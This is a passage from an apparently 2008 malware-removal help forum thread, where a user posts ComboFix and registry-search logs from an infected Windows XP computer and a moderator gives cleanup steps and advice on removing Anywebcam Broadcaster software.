O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: Sygate Personal Firewall Pro (SmcService) - Sygate Technologies, Inc. - C:\Program Files\Sygate\SPF\smc.exe
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe
O23 - Service: TuneUp WinStyler Theme Service (TUWinStylerThemeSvc) - TuneUp Software GmbH - C:\Program Files\TuneUp Utilities 2006\WinStylerThemeSvc.exe
O23 - Service: Dell Wireless WLAN Tray Service (wltrysvc) - Unknown owner - C:\WINDOWS\System32\WLTRYSVC.EXE

--
End of file - 11080 bytes

#8 a_fahmy7, Advanced Member (Full Member, 109 posts)

Posted 17 June 2008 - 10:04 AM

ComboFix log file:

ComboFix 08-06-16.3 - Ahmed Fahmy 2008-06-17 17:36:54.1 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.1426 [GMT 3:00]
Running from: C:\Documents and Settings\Ahmed Fahmy\Desktop\ComboFix.exe
Command switches used :: C:\Documents and Settings\Ahmed Fahmy\Desktop\CFScript.txt
* Created a new restore point
* Resident AV is active


FILE ::
C:\WINDOWS\system32\ccrrhydm.dll
C:\WINDOWS\system32\epwhgnjp.dll
C:\WINDOWS\system32\gfvwynfe.dll
C:\WINDOWS\system32\iifcARIx.dll
C:\WINDOWS\system32\ljJCSkjg.dll
C:\WINDOWS\system32\qoMdabXo.dll
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\WINDOWS\BMcfa4d225.xml
C:\WINDOWS\pskt.ini
C:\WINDOWS\system32\gfvwynfe.dll
C:\WINDOWS\system32\gjkSCJjl.ini
C:\WINDOWS\system32\gjkSCJjl.ini2
C:\WINDOWS\system32\jknllmav.ini
C:\WINDOWS\system32\lpecesnx.ini
C:\WINDOWS\system32\mcrh.tmp
C:\WINDOWS\system32\mdyhrrcc.ini
C:\WINDOWS\system32\oXbadMoq.ini
C:\WINDOWS\system32\oXbadMoq.ini2

.
((((((((((((((((((((((((( Files Created from 2008-05-17 to 2008-06-17 )))))))))))))))))))))))))))))))
.

2008-06-17 16:28 . 2008-06-17 16:28 <DIR> d-------- C:\Program Files\Malwarebytes' Anti-Malware
2008-06-17 16:28 . 2008-06-17 16:28 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Malwarebytes
2008-06-17 16:28 . 2008-06-17 16:28 <DIR> d-------- C:\Documents and Settings\Ahmed Fahmy\Application Data\Malwarebytes
2008-06-17 16:28 . 2008-06-10 19:02 34,296 --a------ C:\WINDOWS\system32\drivers\mbamcatchme.sys
2008-06-17 16:28 . 2008-06-10 19:02 15,864 --a------ C:\WINDOWS\system32\drivers\mbam.sys
2008-06-13 05:35 . 2008-06-13 05:35 <DIR> d-------- C:\Program Files\IBP 9
2008-06-13 05:35 . 2008-06-17 06:52 <DIR> d-------- C:\Documents and Settings\Ahmed Fahmy\Application Data\IBP
2008-06-13 03:55 . 2008-06-13 03:55 23 --a------ C:\WINDOWS\system32\pmac64.dll
2008-06-12 16:24 . 2008-06-12 16:24 <DIR> d-------- C:\Documents and Settings\Guest\Application Data\Talkback
2008-06-12 04:14 . 2008-06-17 03:08 <DIR> d-------- C:\Program Files\EmailMarketingDirector
2008-06-12 00:01 . 2008-04-14 14:01 272,128 --------- C:\WINDOWS\system32\drivers\bthport.sys
2008-06-12 00:01 . 2008-04-14 14:01 272,128 --------- C:\WINDOWS\system32\dllcache\bthport.sys
2008-06-10 16:06 . 2008-06-10 16:07 <DIR> d-------- C:\Program Files\SystemRequirementsLab
2008-06-10 16:06 . 2008-06-10 16:06 <DIR> d-------- C:\Documents and Settings\Ahmed Fahmy\Application Data\SystemRequirementsLab
2008-06-07 00:46 . 2008-06-07 00:46 <DIR> d-------- C:\Program Files\Site Map Maker
2008-06-01 17:33 . 2008-06-01 17:33 <DIR> d-------- C:\players
2008-05-30 21:01 . 2008-05-30 21:01 <DIR> d-------- C:\Program Files\iTunes
2008-05-30 21:01 . 2008-05-30 21:01 <DIR> d-------- C:\Program Files\iPod
2008-05-30 21:01 . 2008-06-13 20:57 54,156 --ah----- C:\WINDOWS\QTFont.qfn
2008-05-30 21:01 . 2008-05-30 21:01 1,409 --a------ C:\WINDOWS\QTFont.for
2008-05-30 20:58 . 2008-05-30 20:58 <DIR> d-------- C:\Program Files\Common Files\Apple
2008-05-27 03:07 . 2008-06-03 01:31 <DIR> d-------- C:\Program Files\Tiger Gaming
2008-05-20 10:10 . 2008-05-20 10:10 <DIR> d-------- C:\Documents and Settings\Ahmed Fahmy\Application Data\Talkback
2008-05-19 22:40 . 2008-06-17 07:05 <DIR> d-------- C:\Program Files\Mozilla Firefox2

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-06-17 02:47 --------- d-----w C:\Documents and Settings\Ahmed Fahmy\Application Data\FileZilla
2008-06-16 21:54 --------- d-----w C:\Program Files\Common Files\Wise Installation Wizard
2008-06-16 20:52 --------- d-----w C:\Documents and Settings\All Users\Application Data\Viewpoint
2008-06-11 00:03 --------- d-----w C:\Documents and Settings\All Users\Application Data\Microsoft Help
2008-06-05 23:48 --------- d-----w C:\Documents and Settings\Ahmed Fahmy\Application Data\Paltalk
2008-05-30 18:01 --------- d-----w C:\Documents and Settings\All Users\Application Data\Apple Computer
2008-05-30 18:01 --------- d-----w C:\Documents and Settings\Ahmed Fahmy\Application Data\Apple Computer
2008-05-30 18:00 --------- d-----w C:\Program Files\QuickTime
2008-05-30 17:29 --------- d-----w C:\Program Files\Safari
2008-05-30 17:19 --------- d-----w C:\Program Files\Apple Software Update
2008-05-10 08:01 --------- d-----w C:\Program Files\Common Files\Adobe
2008-05-10 08:00 --------- d-----w C:\Documents and Settings\Ahmed Fahmy\Application Data\AdobeUM
2008-05-08 12:28 202,752 ----a-w C:\WINDOWS\system32\drivers\rmcast.sys
2008-05-02 13:47 --------- d-----w C:\Program Files\anywebcam
2008-05-02 13:44 --------- d-----w C:\Program Files\Messenger Plus! Live
2008-05-02 13:44 --------- d-----w C:\Program Files\Disney Interactive
2008-05-02 13:44 --------- d-----w C:\Program Files\AIM6
2008-05-02 13:44 --------- d-----w C:\Documents and Settings\Ahmed Fahmy\Application Data\mIRC
2007-09-09 22:02 32 ----a-r C:\Documents and Settings\All Users\hash.dat
2007-02-25 16:10 74,304 -c--a-w C:\Program Files\MC
2007-02-18 22:11 0 ----a-w C:\Documents and Settings\Ahmed Fahmy\Application Data\wklnhst.dat
2007-10-17 14:21 88 --sh--r C:\WINDOWS\system32\66816824E3.sys
2007-10-17 14:21 2,984 --sha-w C:\WINDOWS\system32\KGyGaAvL.sys
.
<pre>
----a-w		 6,382,974 2008-03-13 00:35:12  C:\Downloads\Cucusoft Ultimate DVD + Video Converter Suite\Cucusoft Apple TV Video Converter .exe
----a-w		 8,340,465 2008-03-13 00:25:59  C:\Downloads\Cucusoft Ultimate DVD + Video Converter Suite\Cucusoft Ultimate DVD + Video Converter Suite .exe
</pre>


((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\WINDOWS\system32\ctfmon.exe" [2004-08-10 14:00 15360]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Broadcom Wireless Manager UI"="C:\WINDOWS\system32\WLTRAY.exe" [2006-11-23 09:35 1392640]
"ISUSPM Startup"="C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe" [2004-07-28 01:50 221184]
"SmcService"="C:\PROGRA~1\Sygate\SPF\smc.exe" [2004-08-13 20:05 2532576]
"nod32kui"="C:\Program Files\Eset\nod32kui.exe" [2007-04-08 18:35 949376]
"GrooveMonitor"="C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe" [2006-10-27 00:47 31016]
"SunJavaUpdateSched"="C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe" [2008-02-22 05:25 144784]
"VMSnap3"="C:\WINDOWS\VMSnap3.EXE" [2006-08-30 05:58 49152]
"Domino"="C:\WINDOWS\Domino.EXE" [2006-06-28 12:54 49152]

C:\Documents and Settings\Ahmed Fahmy\Start Menu\Programs\Startup\
Adobe Gamma.lnk - C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe [2005-03-16 20:16:50 113664]
Yahoo! Widget Engine.lnk - C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe [2007-07-20 20:57:16 2913584]

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
Bluetooth.lnk - C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe [2006-05-25 03:28:28 622653]
Digital Line Detect.lnk - C:\Program Files\Digital Line Detect\DLG.exe [2006-12-14 22:22:20 24576]

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"InstallVisualStyle"= C:\WINDOWS\Resources\Themes\Royale\Royale.msstyles
"InstallTheme"= C:\WINDOWS\Resources\Themes\Royale.theme

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
"AppInit_DLLs"=C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"vidc.ffds"= ffdshow.ax
"vidc.DIV3"= DivXc32.dll
"vidc.DIV4"= DivXc32f.dll
"msacm.divxa32"= DivXa32.acm
"msacm.lameacm"= LameACM.dll

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run-]
"ctfmon.exe"=C:\WINDOWS\system32\ctfmon.exe
"DellSupport"="C:\Program Files\Dell Support\DSAgnt.exe" /startup
"googletalk"="C:\Program Files\Google\Google Talk\googletalk.exe" /autostart
"ModemOnHold"=C:\Program Files\NetWaiting\netWaiting.exe
"swg"=C:\Program Files\Google\GoogleToolbarNotifier\1.2.1128.5462\GoogleToolbarNotifier.exe
"msnmsgr"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
"Yahoo! Pager"="C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -quiet

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run-]
"QuickTime Task"="C:\Program Files\QuickTime\qttask.exe" -atboottime
"ATICCC"="C:\Program Files\ATI Technologies\ATI.ACE\cli.exe" runtime -Delay
"PCMService"="C:\Program Files\Dell\MediaDirect\PCMService.exe"
"DAEMON Tools-1033"="C:\Program Files\D-Tools\daemon.exe" -lang 1033
"Google Desktop Search"="C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startup
"ISUSPM Startup"=C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
"ISUSScheduler"="C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe" -start
"ehTray"=C:\WINDOWS\ehome\ehtray.exe
"SigmatelSysTrayApp"=stsystra.exe
"dla"=C:\WINDOWS\system32\dla\tfswctrl.exe
"HP Software Update"=C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
"VMSnap3"=C:\WINDOWS\VMSnap3.EXE
"Domino"=C:\WINDOWS\Domino.EXE
"SynTPEnh"=C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
"TkBellExe"="C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
"iTunesHelper"="C:\Program Files\iTunes\iTunesHelper.exe"

[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusDisableNotify"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\Dell Network Assistant\\ezi_hnm2.exe"=
"C:\\Program Files\\Common Files\\AOL\\ACS\\AOLDial.exe"=
"C:\\Program Files\\Common Files\\AOL\\ACS\\AOLacsd.exe"=
"C:\\Program Files\\Dell\\MediaDirect\\PCMService.exe"=
"C:\\Program Files\\Messenger\\msmsgs.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"C:\\Program Files\\America Online 9.0\\waol.exe"=
"C:\\Program Files\\Google\\Google Talk\\googletalk.exe"=
"C:\\Program Files\\BitSpirit\\BitSpirit.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YServer.exe"=
"C:\\Program Files\\Autodesk\\3ds Max 9\\3dsmax.exe"=
"C:\\Program Files\\Autodesk\\Backburner\\monitor.exe"=
"C:\\Program Files\\Autodesk\\Backburner\\manager.exe"=
"C:\\Program Files\\Autodesk\\Backburner\\server.exe"=
"C:\\Program Files\\Yahoo!\\Yahoo! Music Jukebox\\YahooMusicEngine.exe"=
"C:\\Program Files\\TVUPlayer\\TVUPlayer.exe"=
"C:\\Program Files\\Microsoft Office\\Office12\\OUTLOOK.EXE"=
"C:\\Program Files\\Microsoft Office\\Office12\\GROOVE.EXE"=
"C:\\Program Files\\Microsoft Office\\Office12\\ONENOTE.EXE"=
"C:\\Program Files\\Mozilla Firefox\\firefox.exe"=
"C:\\Program Files\\Common Files\\AOL\\Loader\\aolload.exe"=
"C:\\Program Files\\AIM6\\aim6.exe"=
"C:\\Program Files\\Skype\\Phone\\Skype.exe"=
"C:\\Program Files\\backburner 2\\monitor.exe"=
"C:\\Program Files\\backburner 2\\manager.exe"=
"C:\\Program Files\\backburner 2\\server.exe"=
"C:\\Program Files\\discreet\\combustion 4\\combustion.exe"=
"C:\\Program Files\\SopCast\\adv\\SopAdver.exe"=
"C:\\Program Files\\SopCast\\SopCast.exe"=
"C:\\Program Files\\Internet Explorer\\iexplore.exe"=
"C:\\Program Files\\Bonjour\\mDNSResponder.exe"=
"C:\\Program Files\\Microsoft Games\\Midtown Madness 2\\Midtown2.exe"=
"C:\\Program Files\\Shareaza\\Shareaza.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"=
"C:\\Program Files\\Real\\RealPlayer\\realplay.exe"=
"C:\\WINDOWS\\system32\\usmt\\migwiz.exe"=
"C:\\Program Files\\iTunes\\iTunes.exe"=
"C:\\Program Files\\IBP 9\\IBP.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"10421:UDP"= 10421:UDP:SingleClick Discovery Protocol
"10426:UDP"= 10426:UDP:SingleClick ICC

R0 pnpshark;pnpshark;C:\WINDOWS\system32\DRIVERS\pnpshark.sys [2003-10-02 11:16]
R0 st3shark;st3shark;C:\WINDOWS\system32\DRIVERS\st3shark.sys [2003-09-27 22:37]
R2 hnmwrlspkt;HomeNet Manager Wireless Protocol;C:\WINDOWS\system32\DRIVERS\hnm_wrls_pkt.sys [2006-07-14 10:01]
R2 wsppkt;Wireless Security Protocol;C:\WINDOWS\system32\DRIVERS\wsp_pkt.sys [2006-07-14 10:02]
S3 PAC207;FlyCam USB 100 XP3;C:\WINDOWS\system32\DRIVERS\pfc027.sys [2005-01-25 16:20]
S3 vmfilter303;vmfilter303;C:\WINDOWS\system32\drivers\vmfilter303.sys [2006-04-25 05:57]
S3 Wdm1;USB Bridge Cable Driver;C:\WINDOWS\system32\Drivers\usbbc.sys [2001-01-08 04:53]

.
Contents of the 'Scheduled Tasks' folder
"2008-06-06 14:15:00 C:\WINDOWS\Tasks\1-Click Maintenance.job"
- C:\Program Files\TuneUp Utilities 2006\SystemOptimizer.exe
"2008-05-30 17:19:12 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job"
- C:\Program Files\Apple Software Update\SoftwareUpdate.exe
.
**************************************************************************

catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-06-17 17:45:44
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************

[HKEY_LOCAL_MACHINE\System\ControlSet001\Services\MySQL]
"ImagePath"="\"C:\Program Files\MySQL\MySQL Server 5.0\bin\mysqld-nt\" --defaults-file=\"C:\Program Files\MySQL\MySQL Server 5.0\my.ini\" MySQL"

[HKEY_LOCAL_MACHINE\System\ControlSet001\Services\vsdatant]
"ImagePath"=""
.
------------------------ Other Running Processes ------------------------
.
C:\WINDOWS\system32\ati2evxx.exe
C:\Program Files\Sygate\SPF\Smc.exe
C:\WINDOWS\system32\WLTRYSVC.EXE
C:\WINDOWS\system32\BCMWLTRY.EXE
C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\WINDOWS\ehome\ehrecvr.exe
C:\WINDOWS\ehome\ehSched.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
C:\Program Files\ESET\nod32krn.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\system32\PAStiSvc.exe
C:\WINDOWS\ehome\mcrdsvc.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\system32\ati2evxx.exe
.
**************************************************************************
.
Completion time: 2008-06-17 17:58:38 - machine was rebooted
ComboFix-quarantined-files.txt 2008-06-17 14:58:28

Pre-Run: 25,181,650,944 bytes free
Post-Run: 25,312,124,928 bytes free

247 --- E O F --- 2008-06-12 00:04:25

#9 a_fahmy7 (Advanced Member, Full Member, 109 posts)

Posted 17 June 2008 - 10:21 AM

No more automatic updates error messages, and so far NOD32 detects nothing. I ran NOD32 on the win32 folder specifically and no threats were found.

By the way, how do I uninstall the Anywebcam Broadcaster software? There is no uninstall option, and the program doesn't appear in Add/Remove Programs nor in the TuneUp Utilities program list. I have been trying to do this for weeks now.

Edited by a_fahmy7, 17 June 2008 - 10:33 AM.


#10 a_fahmy7 (Advanced Member, Full Member, 109 posts)

Posted 17 June 2008 - 03:51 PM

OK, the infection is still there, it seems: NOD32 detected the same Adware.Virtumonde.

File: C:\system volume information\_restore {129201FA-B0AC-49B3-96B2-DEB8...\A0093271.DLL and A0093272.DLL

It says they have been moved to quarantine.

#11 TheJoker (Forum Deity, Boot Camp Mod, 14,352 posts)

Posted 17 June 2008 - 07:39 PM

OK, the infection is still there, it seems: NOD32 detected the same Adware.Virtumonde.

File: C:\system volume information\_restore {129201FA-B0AC-49B3-96B2-DEB8...\A0093271.DLL and A0093272.DLL

Anything in System Restore is not a problem. The files or registry entries are not active. Everything in System Restore will be deleted and a new Restore Point set as we clean up from the infection.

Go to Start > Run and copy and paste the next command into the field:
ComboFix /u

Make sure there's a space between ComboFix and /
Then hit Enter.

This will uninstall ComboFix, delete its related folders and files, reset your clock settings, hide file extensions, hide the system/hidden files and reset System Restore again.

Create a Restore Point
  • Go to Start > Programs > Accessories > System Tools > System Restore
  • Select Create a Restore Point and then Next.
  • In the box for "Restore point description", enter a descriptive name and press Create
  • When the "Restore Point Created" window appears, click Close
Run Disk Cleanup
  • Go to Start > Run and type the below line:
    cleanmgr
  • Click OK
    • If you have more than one drive, select the drive Windows is installed on
    • Click OK
  • When Disk Cleanup opens, select the More Options tab
  • In the System Restore section (bottom of window), click Cleanup
    • In the confirmation window that opens, click Yes
  • Now click on the Disk Cleanup tab and select the following items:
    • Downloaded Program Files
    • Temporary Internet Files
    • Recycle Bin
    • Temporary Files
  • Click OK
  • in the confirmation window, select Yes (Disk Cleanup will close).

By the way, how do I uninstall the Anywebcam Broadcaster software? There is no uninstall option, and the program doesn't appear in Add/Remove Programs nor in the TuneUp Utilities program list. I have been trying to do this for weeks now.


There doesn't appear to be any automated way to remove Anywebcam Broadcaster. I found a review where someone posted a reply frying the reviewer for not pointing out little things like it being adult software offered on a teen site, that they use stills from any video you broadcast in their adult ads, and that there is no uninstaller for the software.

That seems correct, as I was unable to locate an uninstaller. Googling for "uninstall anywebcam", you find http://anywebcam.qarchive.org/, which seems strange since that text doesn't display on the web site. Searching the page source, you can find this embedded in the page:
http://uninstall-anywebcam.qarchive.org
What it takes you to, though, is ads for other software.
You could ask the question at http://support.anywebcam.com, but since Google shows no instance of the word uninstall on their site (Google for uninstall site:support.anywebcam.com), I wouldn't hold my breath.

There are two options.

1. You could download a free or trial uninstaller like Total Uninstall and then attempt to remove it with that software.
2. Do a search for the executable in the registry and see what we can delete, along with the program folder.

Free Tools for Fighting Malware
Anti-Virus: avast! Free Antivirus / Avira Free AntiVirus
OnLine Anti-Virus: ESET / BitDefender / F-Secure
Anti-Malware: Malwarebytes' Anti-Malware / Dr.Web CureIt
Spyware/Adware Tools: MVPS HOSTS File / SpywareBlaster
Firewall: Comodo Firewall Free / Privatefirewall
Tutorials: How did I get Infected? / Internet Explorer Privacy & Security Settings
If we have helped, please help us continue the fight by using the Donate button, or see this topic for other ways to donate.

MS MVP 2009-2010 and ASAP Member since 2005


#12 a_fahmy7 (Advanced Member, Full Member, 109 posts)

Posted 18 June 2008 - 08:47 AM

Thanks a lot for your efforts :)

Concerning Broadcaster: 1) Total Uninstall seems a nice program, but it still didn't list anywebcam or broadcaster either :(

2) Registry searching for both strings "anywebcam" and "broadcaster" revealed:

- HKEY_LOCAL_MACHINE\SOFTWARE\Anywebcam\Broadcaster
- HKEY_USERS\S-1-5-21-3626108329-3047563160-3139894105-1006\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\Anywebcam
- c:\program files\anywebcam\broadcaster.exe
  Type: REG_SZ
  Data: Broadcaster



Can I just delete the program folder and then use TuneUp Utilities to fix the registry and delete missing keys? Of course it would still be risky.

What do you think?

#13 TheJoker (Forum Deity, Boot Camp Mod, 14,352 posts)

Posted 18 June 2008 - 05:05 PM

Instead of simply deleting the folder, we can use a utility that will also unregister any of the files when they are deleted.

Can I just delete the program folder and then use TuneUp Utilities to fix the registry and delete missing keys? Of course it would still be risky.

You could, and yes that can tend to be risky. Unless you are certain of each key suggested for deletion, for instance checking closely on what they are, a registry cleaner can be a faster way to damage the registry than can be done manually. For instance, if you have Office installed, I've seen a registry cleaner damage the installation deleting so called orphaned keys to the point that none of the Office programs will start. Let's start with getting a list of the keys based on the terms you used, only in the format I need them to build a .reg file that will remove those entries.

Download Registry Search by Bobbi Flekman, save it, and extract regsearch.exe to the Desktop. You will use it in a moment.

Double-click regsearch.exe to start it. In the top window, enter anywebcam as the search string on the first line, and on the line below it, enter broadcaster. Make sure all the option boxes are checked, and click "Ok". Notepad will be opened with text in it (the file will be saved to the Desktop as well, as RegSearch.txt). Post this text in your next reply.



#14 a_fahmy7 (Advanced Member, Full Member, 109 posts)

Posted 19 June 2008 - 09:10 AM

Windows Registry Editor Version 5.00

; Registry Search 2.0 by Bobbi Flekman © 2005
; Version: 2.0.5.0

; Results at 6/19/2008 5:07:25 PM for strings:
; 'anywebcam '
; 'broadcaster'
; Strings excluded from search:
; (None)
; Search in:
; Registry Keys Registry Values Registry Data
; HKEY_LOCAL_MACHINE HKEY_USERS


[HKEY_LOCAL_MACHINE\SOFTWARE\Anywebcam\avatar7]
"Broadcaster.AllowCapture"="False"

[HKEY_LOCAL_MACHINE\SOFTWARE\Anywebcam\Broadcaster]

[HKEY_LOCAL_MACHINE\SOFTWARE\Eset\Nod\CurrentVersion\Modules\Imon\Settings]
"UserAgentList"="Acrobat Messages Updater\\AcroRd32.exe|ACS 4166.1281\\AOLacsd.exe|ActEXE\\act.exe|Adobe Flash Player Downloader\\Download.exe|Adobe Flash Player Installation Reporter\\Download.exe|Adobe Update Manager\\AdobeUpdateManager.exe|AdobeStockPhotos\\Bridge.exe|Apple-PubSub/61\\Safari.exe|Apple-PubSub/65\\Safari.exe|AtomicMailSender3\\AtomicMailSender.exe|AWCRequester\\firefox.exe|BFTS/2.0\\aolsoftware.exe|BitTorrent/4.1.2\\BitSpirit.exe|Borland SOAP 1.2\\Metacafe.exe|Broadcaster/3.0\\Bac.exe|Broadcaster/3.0\\Broadcaster.exe|Campaign Broswer\\EmailMarketingDirector4.exe|Client\\IEXPLORE.EXE|ClipOrganizer\\MSTORDB.EXE|contype\\firefox.exe|Cortado/0.2.2 Sun/1.6.0_03 Mozilla/4.0\\firefox.exe|DigitAl56K/6.3.0.0\\DivXConnectionTester.exe|DivX Player 2.0\\DivX Player.exe|dwplayer\\ymp7EB.tmp|Dynamic Update\\winnt32.exe|ee://aol/http\\aim6.exe|ee://aol/http\\aolsoftware.exe|ESDConnector\\AdobeUpdater.exe|ESDConnector\\ahc.exe|FileZilla 3.0.4.1\\filezilla.exe|Google Talk\\googletalk.exe|gSOAP/2.7\\YahooMessenger.exe|gSOAP/2.7\\YAHOOM~1.EXE|HelpSupportServices\\HelpCtr.exe|HelpSupportServices\\HelpHost.exe|HP Lookup Agent\\hpzwup01.exe|HP\\hpqtra08.exe|hprbUpdate\\hprbUpdate.exe|InternetUtil\\hpzwup01.exe|iTunes/7.6.2\\iTunes.exe|Java/1.6.0_03\\javaw.exe|JDeveloper/10.1.3.2.0\\jdevw.exe|jupdate\\jre-6u2-windows-i586-p-iftw_7070c3f7.exe|jupdate\\jre-6u3-windows-i586-p-iftw_2cd32978.exe|jupdate\\jre-6u5-windows-i586-p-iftw_1b121abb.exe|jupdate\\jucheck.exe|jupdate\\jusched.exe|LegitCheck\\firefox.exe|LegitCheck\\wgatray.exe|Logitech Video\\msnmsgr.exe|Megaupload\\IEXPLORE.EXE|Messenger Stats Client\\msnmsgr.exe|MessengerPlusLive\\msnmsgr.exe|MetacafeDownloader\\RunDll32.exe|Microsoft BITS/6.6\\svchost.exe|Microsoft Internet Explorer\\fds.exe|Microsoft Office/11.0\\WINWORD.EXE|Microsoft Office/12.0\\CLVIEW.EXE|Microsoft Office/12.0\\OUTLOOK.EXE|Microsoft Office/12.0\\WINWORD.EXE|Microsoft URL Control - 6.00.8862\\Athan.exe|Microsoft URL Control - 6.00.8862\\PrepLogic 
Practice Exams.exe|Microsoft-CryptoAPI/5.131.2600.2180\\AdobeUpdateManager.exe|Microsoft-CryptoAPI/5.131.2600.2180\\dpinst.exe|Microsoft-CryptoAPI/5.131.2600.2180\\Explorer.EXE|Microsoft-CryptoAPI/5.131.2600.2180\\firefox.exe|Microsoft-CryptoAPI/5.131.2600.2180\\IMVUClient.exe|Microsoft-CryptoAPI/5.131.2600.2180\\jucheck.exe|Microsoft-CryptoAPI/5.131.2600.2180\\Midtown2.exe|Microsoft-CryptoAPI/5.131.2600.2180\\msiexec.exe|Microsoft-CryptoAPI/5.131.2600.2180\\msnmsgr.exe|Microsoft-CryptoAPI/5.131.2600.2180\\POWERPNT.EXE|Microsoft-CryptoAPI/5.131.2600.2180\\redlightcenter.exe|Microsoft-CryptoAPI/5.131.2600.2180\\Setup.exe|Microsoft-CryptoAPI/5.131.2600.2180\\smc.exe|Microsoft-CryptoAPI/5.131.2600.2180\\SoftwareUpdate.exe|Microsoft-CryptoAPI/5.131.2600.2180\\SopCast.exe|Microsoft-CryptoAPI/5.131.2600.2180\\WgaTray.exe|Microsoft-CryptoAPI/5.131.2600.2180\\WLLoginProxy.exe|Microsoft-CryptoAPI/5.131.2600.2180\\WLSetupSvc.exe|Microsoft-CryptoAPI/5.131.2600.2180\\wmiprvse.exe|Microsoft-CryptoAPI/5.131.2600.2180\\YahooMusicEngine.exe|mozbar 3.04 xpi BETA\\firefox.exe|mozbar 3.05 xpi\\firefox.exe|mozbar 3.06 xpi\\firefox.exe|mozbar 3.11 xpi\\firefox.exe|mozbar 3.12 xpi\\firefox.exe|mozbar 3.15 xpi\\firefox.exe|mozbar 3.16 xpi\\firefox.exe|mozbar 3.17 xpi\\firefox.exe|mozbar 3.18 xpi\\Explorer.EXE|mozbar 3.18 xpi\\firefox.exe|Mozilla Compatible/2.0\\yupdater.exe|Mozilla/3.0\\AcroRd32.exe|Mozilla/4.0\\3dsmax.exe|Mozilla/4.0\\_launcher.exe|Mozilla/4.0\\act.exe|Mozilla/4.0\\ahc.exe|Mozilla/4.0\\aim6.exe|Mozilla/4.0\\Bit_Che.exe|Mozilla/4.0\\BitSpirit.exe|Mozilla/4.0\\Bridge.exe|Mozilla/4.0\\CamtasiaStudio.exe|Mozilla/4.0\\CLVIEW.EXE|Mozilla/4.0\\Corel Snapfire.exe|Mozilla/4.0\\DivX 
